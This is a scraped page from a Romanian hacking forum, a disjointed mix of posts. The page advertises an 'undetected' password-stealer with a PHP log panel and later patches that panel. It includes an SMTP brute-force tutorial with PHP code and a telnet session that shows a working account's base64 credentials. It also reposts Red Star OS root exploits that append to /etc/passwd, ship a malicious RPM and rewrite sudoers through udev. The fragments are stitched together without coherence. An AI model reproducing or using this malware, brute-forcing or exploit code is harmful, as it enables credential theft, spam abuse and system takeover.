Leaderboard

Pro Mailer: PHP - Inbox - Attach files - Smtp - SSL Download http://pastebin.com/HnMUgbnt

Features: Undetected: Server Scan PHP Panel Strong data encryption Protected with latest technologies to prevent eavesdropping Update notifications Working with: Internet Explorer (all versions) Google Chrome Mozilla Firefox Opera Mozilla Thunderbird Outlook 2013 Pidgin Skype Logs Yahoo ETS Filezilla Steam Username BattleNet Username Windows Key COAILII v1.6: Coailii Password Recovery.exe — RGhost — file sharing PHP Panel: Coailii Password Recovery Admin Panel Changelog v1.6: Version 1.6: 1. Fixed Firefox sometimes requiring C++ 2010 redistributable. 2. Fixed Internet Explorer support for Windows XP and 7 4. Added Outlook support 5. Added Thunderbird support 6. Added BattleNet username recovery 7. Added Skype Logs recovery 8. Faster execution of several recovery modules Screenshot: Credits: @.Breacker betatesting Daca aveti intrebari sau intampinati probleme, postati aici!

lol, am incercat pe antivirusu Risen si a mers, mersi omule!

Astazi am decis sa explic tuturor celor care tot cauta scannere/brute si mai stiu eu ce pentru a prinde servere smtp. Motivul este ca peste tot vad ceva de genu: - scanner smtp 2012 - new scanner smtp 2014 - prinde 100 smtpuri pe zi - scanner plm 2015 - 300 pe zi Sincer e penibil. Nu stau sa explic definita protocolului SMTP ca sunt o gramada de ghiduri pe internet, doar facand un exemplu: wikipedia. Sa incepem, Un brute pentru smtp e simplu un script care incearca sa faca login stand dupa definitia protocolui, si puntr-un loop incearca login cu mai multe usere si parole, asta e clasicul tip de brute cu dictionar. Pentru a te conecta la uns erver prin smtp se paote face prin portul 25, 587, 465 si nu stiu altele porturi care sunt acum noi. Portul 25 daca cititi pe internet e spart de spam si acum se incearca sa se adapteze si pe alte porturi. Astazi vreau sa vorbesc despre simplu acces smtp fara tls, ssl. pentru a intelege pasii de facut pentru a loga pur si simplu se poate face prin telnet din cmd sau orice alt terminal: telnet smtp.comcast.com 25/587: [mojito@baubau HOSTNAMES]$ telnet smtp.comcast.net 25 Trying 68.87.20.6... Connected to smtp.comcast.net. Escape character is '^]'. 220 resomta-ch2-12v.sys.comcast.net comcast ESMTP server ready Avem un raspuns cu codul 220 asta inseamna ca portul 25 in iesire la noi in pc e deschis si ca serverul accepta conexiuni si acum sta in asteptare de alte comenzi. <?php $socket = fsockopen($domain, 25, $errno, $errstr, 10); if (!$socket) exit(0); $buff = fgets($socket, 512); if (substr(trim($buff), 0, 3) != "220") exit(0); //daca primele 3 cifre nu sunt 220 conexiunea se termina print $buff\n; ?> Un simplu exemplu de a se conecta prin php. Urmatoarea comanda e de a spune serverului ca esti acolo, un gen de salut sa zicem, prin comanda EHLO sau HELO. Diferentele dintre EHLO si HELO va recomand pur si simplu wikipedia. Pentru a face autentificarea noi com utiliza comanda EHLO urmata de orice nume vreti. [mojito@baubau HOSTNAMES]$ telnet smtp.comcast.net 25 Trying 68.87.20.6... Connected to smtp.comcast.net. Escape character is '^]'. 220 resomta-ch2-04v.sys.comcast.net comcast ESMTP server ready ehlo mojito 250-resomta-ch2-04v.sys.comcast.net hello [192.64.83.46], pleased to meet you 250-HELP 250-AUTH LOGIN PLAIN 250-SIZE 36700160 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-STARTTLS 250 OK urmarind logica protocolului acum urmeaza sai dam comanda la server zicandui ca vrem sa ne logam la el cu user si parola prin comanda AUTH LOGIN: [mojito@baubau HOSTNAMES]$ telnet smtp.comcast.net 25 Trying 68.87.20.6... Connected to smtp.comcast.net. Escape character is '^]'. 220 resomta-ch2-05v.sys.comcast.net comcast ESMTP server ready ehlo user 250-resomta-ch2-05v.sys.comcast.net hello [192.64.83.46], pleased to meet you 250-HELP 250-AUTH LOGIN PLAIN 250-SIZE 36700160 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-STARTTLS 250 OK auth login 334 VXNlcm5hbWU6 Raspunsul 334 urmarit de: VXNlcm5hbWU6 inseamna ca asteapta sa introduceti userul, pentru mai multe detalii in privinta acestui raspuns va invit sa citi RFC'ul respectiv ce explica toate comenzile in mod detaliat. <?php $socket = fsockopen($domain, 25, $errno, $errstr, 10); if (!$socket) exit(0); $buff = fgets($socket, 512); if (substr(trim($buff), 0, 3) != "220") exit(0); //daca primele 3 cifre nu sunt 220 conexiunea se termina print $buff\n; fputs($socket, "EHLO USER\r\n"); //precum standardului \r\n sunt obligatorii pentru a zice serverului ca ai terminat comanda si sa mearga mai departe $buff = fgets($socket, 512); if (substr(trim($buff), 0, 3) != "250") exit(0); //daca nu gasim raspunsul 250 iesim din program. codul 250 inseamna ca serverul a acceptat comanda //se poate face printr-un loop pentru a vedea tot raspunsul protocolului, dar ajung sa gasesti un singur 250 in raspuns fputs($socket, "AUTH LOGIN\r\n"); if (substr(trim($buff), 4, 16) != "VXNlcm5hbWU6") exit(0); //daca nu gasim acest string iesim din program $user = base64_encode("USER"); //precum standardului smtp accepta userul criptat in base64 fputs($socket, "$user\r\n"); ?> O data pus userul vedem daca accepta userul si daca ne trimite mai departe pentru a baga si parola: [mojito@baubau HOSTNAMES]$ telnet smtp.comcast.net 25 Trying 68.87.20.6... Connected to smtp.comcast.net. Escape character is '^]'. 220 resomta-ch2-05v.sys.comcast.net comcast ESMTP server ready ehlo mojito 250-resomta-ch2-05v.sys.comcast.net hello [192.64.83.46], pleased to meet you 250-HELP 250-AUTH LOGIN PLAIN 250-SIZE 36700160 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-STARTTLS 250 OK auth login 334 VXNlcm5hbWU6 ZC5sYXVnaGxpbkBjb21jYXN0Lm5ldA== 334 UGFzc3dvcmQ6 raspunsul 334 si acel string functioneaza ca si pentru user, asta inseamna ca userul a fost acceptat si acum serverul asteapta sa introduceti parola, si parola bineinteles in base64. <?php $socket = fsockopen($domain, 25, $errno, $errstr, 10); if (!$socket) exit(0); $buff = fgets($socket, 512); if (substr(trim($buff), 0, 3) != "220") exit(0); //daca primele 3 cifre nu sunt 220 conexiunea se termina print $buff\n; fputs($socket, "EHLO USER\r\n"); //precum standardului \r\n sunt obligatorii pentru a zice serverului ca ai terminat comanda si sa mearga mai departe $buff = fgets($socket, 512); if (substr(trim($buff), 0, 3) != "250") exit(0); //daca nu gasim raspunsul 250 iesim din program. codul 250 inseamna ca serverul a acceptat comanda //se poate face printr-un loop pentru a vedea tot raspunsul protocolului, dar ajung sa gasesti un singur 250 in raspuns fputs($socket, "AUTH LOGIN\r\n"); if (substr(trim($buff), 4, 16) != "VXNlcm5hbWU6") exit(0); //daca nu gasim acest string iesim din program $user = base64_encode("USER"); //precum standardului smtp accepta userul criptat in base64 fputs($socket, "$user\r\n"); if (!($buff = fgets($socket, 512))) exit(0); if (substr(trim($_SockResult), 4, 16) != "UGFzc3dvcmQ6") exit(0); $pass = base64_encode("PASSWORD"); fputs($socket, "$pass\r\n"); if(substr(trim($vuff), 0, 3) != "235") { print "Invalid login\n"; exit(0); } else { print "Login facut cu success\n"; } ?> [mojito@baubau HOSTNAMES]$ telnet smtp.comcast.net 25 Trying 96.114.157.81... Connected to smtp.comcast.net. Escape character is '^]'. ehlo mojito 220 resomta-po-09v.sys.comcast.net comcast ESMTP server ready 250-resomta-po-09v.sys.comcast.net hello [192.64.83.46], pleased to meet you 250-HELP 250-AUTH LOGIN PLAIN 250-SIZE 36700160 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-STARTTLS 250 OK auth login 334 VXNlcm5hbWU6 ZC5sYXVnaGxpbkBjb21jYXN0Lm5ldA== 334 UGFzc3dvcmQ6 Mzc3M2psYWQ= 235 2.7.0 ... Authentication succeeded O data ce am introdus parola dupa cum puteti vedea am facut cu success autentificarea. Daca autentificarea a avut success prin simpla comanda quit se poate deconecta de la server si a trece la urmatorul. Ghidul acesta a fost ceva general pentru a da o idee ficaruia cum functioneaza protocolul smtp. In 2012, 2013, 2015 protocolul a ramas acelasi deci cand eu aud : scanner smtp 2015 / prinde 300 pe zi ma enervez foarte rau. Da am inteles ca poti sal faci sa mearga mai rapid prin multithreading , poti sa faci controale mai bune la raspunsurile serverului, poti face un check pe portul respectiv si apoi sa faci brute doar pe ip'uri sau hosturi care au portul deschis, poti sa folosesti alt limbaj de programare care gestioneaza mai bine multithreading, poti avea un "root" puternic care e capabil sa deschida multe procese pentru multithreading, sau mai stiu eu ce, dar protocolul smtp ramane acelasi in orice caz, te poti juca cu usere si parole cum vrei tu, dar daca nu ai "root" bun ce poate sa faca cum am zis mai sus si bineinteles merge mai rapid si ai mai multe probabilitati sa gasesti smtpuri intr-un timp mai scurt si de a rula foarte multe hosturi sau ip'uri. Pentru mai multe detalii va invit sa cititi despre acest protocol. Va multumesc pentru atentie

La windows 7, 32 biti trebuie sa fie instalat visual basic 2010 altfel nu o sa mearga

Cel mai probabil nu ai introdus corect parola pentru userul root al database-ului. (asta daca, userul tau cu privilegii pe database se cheama 'root' )

RedStar 2.0 Desktop - Privilege Escalation (World-writeable rc.sysinit) Red Star 2.0 desktop ships with a world-writeable "/etc/rc.d/rc.sysinit" which can be abused to execute commands on boot. An example exploitation of this vulnerability is shown here https://github.com/HackerFantastic/Public/blob/master/exploits/redstar2.0-localroot.png PoC: /bin/echo "r00t::0:0::/tmp:/bin/bash" >> /etc/passwd su - root ## Source: http://www.openwall.com/lists/oss-security/2015/01/09/6 Source RedStar 3.0 Desktop - Privilege Escalation (Software Manager - swmng.app) The root user is disabled on Red Star, and it doesn't look like there is a way to enable it. UnFortunately, they left a big security hole: the Software Manager (swmng.app), which runs as root through sudo and will install any RPM package, even if unsigned. To get root, get this RPM package I made into Red Star through an ISO (if you're using a virtual machine) or USB key, double-click it to open it with the Software Manager, and click through the blue buttons until it’s done. After that, run rootsh to get a root shell. Being a RedHat-based system (hinting on Fedora 15), SELinux will prevent you from doing some things, but disabling it is a matter of running setenforce 0 as root. Download: https://mega.co.nz/#!jgBT0RxZ!LQDEBBrbGxE6fag4d_A2C2cWj2PSNR_ZvnSW_UjRD5E Mirror: http://www.exploit-db.com/sploits/redstarroot.rpm ## Source: http://richardg867.wordpress.com/2015/01/01/notes-on-red-star-os-3-0/ & http://www.openwall.com/lists/oss-security/2015/01/09/1 Source RedStar 3.0 Desktop - Privilege Escalation (Enable sudo) #!/bin/bash -e cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak echo 'RUN+="/bin/bash /tmp/r00t.sh"' > /etc/udev/rules.d/85-hplj10xx.rules cat <<EOF >/tmp/r00t.sh echo -e "ALL\tALL=(ALL)\tNOPASSWD: ALL" >> /etc/sudoers mv /tmp/udevhp.bak /etc/udev/rules.d/85-hplj10xx.rules chown 0:0 /etc/udev/rules.d/85-hplj10xx.rules rm /tmp/r00t.sh EOF chmod +x /tmp/r00t.sh echo "sudo will be available after reboot" sleep 2 reboot ## Source: https://twitter.com/sfan55/status/550348619652796416 & http://www.openwall.com/lists/oss-security/2015/01/09/6 Source

Windows Installation Media Creation Tool Dac? dori?i s? instala?i sau s? reinstala?i Windows 8.1 ?i nu ave?i suportul de instalare, îl pute?i crea pornind de la aceast? pagin?. Va trebui s? utiliza?i un PC cu o conexiune fiabil? la internet ?i fie s? salva?i fi?ierele de instalare pe o unitate flash USB, fie s? inscrip?iona?i un fi?ier ISO pe un DVD. Porniti Windows Installation Media Creation Tool. Alegeti limba, versiunea Windows-ului si arhitectura (32/ 64 biti). Alegeti unde salvati fisierele de instalare, pe unitatea USB (trebuie introdus sticul), ori ca imagine ISO (pentru arderea ulterioara pe DVD), specificand locatia unde se va salva. Face iso win 8 cu aproape toate update-urile. Crearea suportului de instalare pentru Windows 8.1 - Ajutor Windows

Scrii pe google eroarea si vei gasi solutia.

OFF: http://hackforums.net/showthread.php?tid=4457709 )

Ceva de genul asta regasesc prin pagina: Notice: Undefined variable: row in /home/u271053027/public_html/dashboard.php on line 79 Notice: Undefined index: delete-id in /home/u271053027/public_html/dashboard.php on line 239 Notice: Undefined index: a in /home/u271053027/public_html/dashboard.php on line 253 ... imi trimite log doar pentru Serial Number Microsoft Windows XP Professional ... bla bla ...

Sa nu-l puneti pe virustotal ca se duce pe Coailli... Bravo, felicitari !

Felicitari ! Dar sa stii ca merita un alt nume ... Maine scoate unu "Vagina Dick Logger" ... this troll never ends ..

"Ie frumos da nu prea" Bravo, dar baga mai multe in el, si numele nu il reprezinta (cum am mai zis de 100 de ori). Keep up the good work

Vezi ca ai incurcat linkurile. La PHP Panel download ai pus Coailii Stealer.exe si invers.

Copy-writere uita-te daca a mai fost postat inainte https://rstforums.com/forum/93541-smartwatch-hacked-data-exchange-smartphone-not-so-secure.rst . p.s: felictari, eu in 2-3 ani fac posturile tale, tu in 2 saptamani ai ajuns la o competenta mare.

Stii sa citesti ? "Aratati-va aici hack-urile si atacurile voastre! Fake hackers gona be warned" . + de ce ai pune la showoff ceva care are legatura cu metin?

Vezi ca faci pleonasm e RST nu RST Team (romanian security team team). Bun venit . le: cauta sa inveti programare, dupa or sa vina si bani. le2: incearca sa eviti xerox-urile.

@aelius , nu boss, stam si radem de spectacol )

si chat-ul de pe rst se poate folosi pentru conferinte..

cred ca se poate inchide parerea mea este ca este exact 9/11 si totul este organizat de francezi ca sa poata declara situatie de terorism..fix copia americanilor

(script kiddie daca folosesti tool-uri, asta desigur daca nu tu ti-ai scris tool-urile) Poti sa incepi a invata python (cel mai usor limbaj de programare pe care eu il consider) si php. Infractiunile informatice din Noul Cod Penal oare chiar se merita? iti dau exemplu pe tinkode, banuiesc ca il stii si tu, daca el a fost prins, tu vei deveni mai bun ca el? Mai bine inveti programare, dupa despre linux si o sa fii mult mai castigat, sau vrei sa fii hacker fara bani? ontopic: foloseste centos pentru penetrare.

Fix pentru search: Deschideti search.php cu un editor, dati replace de la <?php pana la primul ?> cu: <?php if ($_GET['delete-id']) { $id = (int) $_GET["delete-id"]; $query = mysql_query("DELETE FROM `data` where id='$id'"); echo "<br /><center>The log was removed successfully</center><br />"; echo "<meta http-equiv=Refresh content=2;url=dashboard.php>"; } function clear($str) { $clear = mysql_escape_string(htmlentities($str, ENT_QUOTES)); return $clear; } $keyword = $_GET['keyword']; if (!empty($keyword)) { $clearstr = clear($keyword); $sql = "SELECT * FROM data WHERE url LIKE '%$clearstr%' ORDER BY id DESC"; $result = mysql_query($sql); $row = mysql_fetch_assoc($result); $num = mysql_num_rows($result); if ($num == 0) { echo 'There are no logs'; } else { echo '<p>' . $num . ' results were found for your search</p>'; echo ' <table class="table table-bordered table-striped table-hover"> <tr> <th>App</th> <th>URL</th> <th>Username</th> <th>Password</th> <th>PC Name</th> <th>IP</th> <th>Time</th> </tr>'; for($i=0;$i<$num;$i++) { echo ' <tr class="even"> <td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td> <td>' . $row['url'] . '</td> <td>' . $row['user'] . '</td> <td>' . $row['pass'] . '</td> <td>' . $row['pc_name'] . '</td> <td>' . $row['ip'] . '</td> <td>' . $row['time'] . '</td> <td> <a href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a> </td> </tr>'; } echo '</table>'; } } ?> Dati save, urcati fisierul la loc pe host si gata. Si ca sa aliniati sidebarul cu "contentul", intrati in header.php, cautati <div class="col-sm-3 col-md-2 sidebar"> si dati replace cu <div class="col-sm-3 col-md-2 sidebar" style="margin: 1.7% 0;"> si gata.

@Nytro unde le gasesti bre? al doilea e EPIC

buna ziua as dori sa stiu si eu cum pot primi o invitatie pe filelist....ma poate ajuta cineva?multumesc

Ciolan

Nu ar trebui sa fie mai multe link-uri catre rst? gen daca tot e [RST]?

)))))))